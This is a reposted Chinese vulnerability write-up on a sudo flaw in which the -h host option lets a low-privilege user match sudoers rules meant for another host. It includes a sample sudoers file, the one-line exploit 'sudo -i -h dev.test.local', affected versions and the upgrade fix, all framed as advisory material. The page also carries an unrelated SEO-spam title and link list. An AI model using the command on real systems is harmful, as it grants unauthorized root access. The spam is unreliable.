当前位置: 首页 > wzjs >正文

制作html网站模板互联网推广招聘

制作html网站模板,互联网推广招聘,金沙网站怎么做代理,图片设计制作软件文章目录 影响组件漏洞分析漏洞复现影响版本漏洞修复 影响组件 Linux 是一种免费开源的类 Unix 操作系统,广泛应用于服务器、嵌入式设备及云计算领域。Sudo 是一款在类 Unix 系统中用于允许授权用户以其他用户(通常是超级用户)的安全权限执行…

文章目录

  • 影响组件
  • 漏洞分析
  • 漏洞复现
  • 影响版本
  • 漏洞修复

影响组件

Linux 是一种免费开源的类 Unix 操作系统,广泛应用于服务器、嵌入式设备及云计算领域。Sudo 是一款在类 Unix 系统中用于允许授权用户以其他用户(通常是超级用户)的安全权限执行命令的工具,广泛应用于系统管理和运维过程中。它提供了灵活的访问控制机制,允许系统管理员精细地控制哪些用户可以执行哪些命令,以及在何种条件下执行。

漏洞分析

sudo -h (–history):该选项设计初衷是​​仅与 -l(–list)配合​​,用于查询用户在​​远程主机​​的sudo 权限(例:sudo -l -h dev-server)。

Sudo 未限制 -h 与其他命令(如 sudoedit 或执行命令)的组合使用。当攻击者执行 sudo -h rogue-host COMMAND 时,Sudo 错误地使用 rogue-host 的主机名匹配本地 sudoers 规则,而非当前真实主机名。

执行 sudo -h dev.test.local id 后,Sudo 错误地将本地主机视为 dev.test.local,从而允许执行命令。

# sudoers 文件示例(分发至多台主机)
Host_Alias DEV = dev.test.local
Host_Alias PROD = prod.test.local
lowpriv DEV = ALL    # 允许在dev主机执行所有命令
lowpriv PROD = !ALL  # 明确禁止在prod主机执行命令

漏洞复现

查看当前权限,普通用户
在这里插入图片描述
执行

sudo -i -h dev.test.local

成功提权
在这里插入图片描述

影响版本

1.9.0 <= sudo <= 1.9.17
1.8.8 <= sudo <= 1.8.32

漏洞修复

升级到官方更新的安全版本:sudo >= 1.9.17p1

http://www.dtcms.com/wzjs/3439.html

相关文章:

  • 常用博客建站程序seo推广工具
  • wordpress 文章无法显示长春做网络优化的公司
  • 网站怎么做百度百科百度竞价网站
  • WordPress弊端东莞seo搜索
  • 产品开发设计哈尔滨seo公司
  • 建立网站后还要钱吗企业邮箱申请
  • 医疗器械注册证查询广东seo
  • 长沙望城建设局网站搜索网站大全排名
  • 网站设计建设seo模拟点击算法
  • 河北网站建设推广公司深圳网络提速优化服务包
  • 网站建设属于那个科目手机如何创建网站
  • 网站建设网站合同版本新东方烹饪培训学校
  • ic电子网站建设互联网运营自学课程
  • 天津企业网站建站市场调研报告最佳范文
  • 娄底360seo优化公司网站优化师
  • 万网如何上传网站网络营销五个主要手段
  • 网页制作与网站建设技术大全 pdf最新行业动态
  • 快速免费做网站网站域名购买
  • o2o和o2b、o2c模式是什么意思啊百度seo搜索排名
  • 找网络公司做网站需要注意seo的形式有哪些
  • 想搭网站做软件首先要学设么浙江网络推广
  • 化妆品网站设计系统需求的策划书外汇交易平台
  • 网站维护推广表徐州百度运营中心
  • 制作化妆品网站百度竞价排名是哪种方式
  • 建设网站需要什么软件下载制作一个app软件需要多少钱
  • 深圳做网站收费百度seo报价
  • 智能写作网站公司网站的推广
  • 甘肃兰州疫情最新情况最新消息河南网站seo费用
  • 网站建设 郑州国内疫情最新情况
  • 嘉陵 建设 摩托车官方网站百度seo推广工具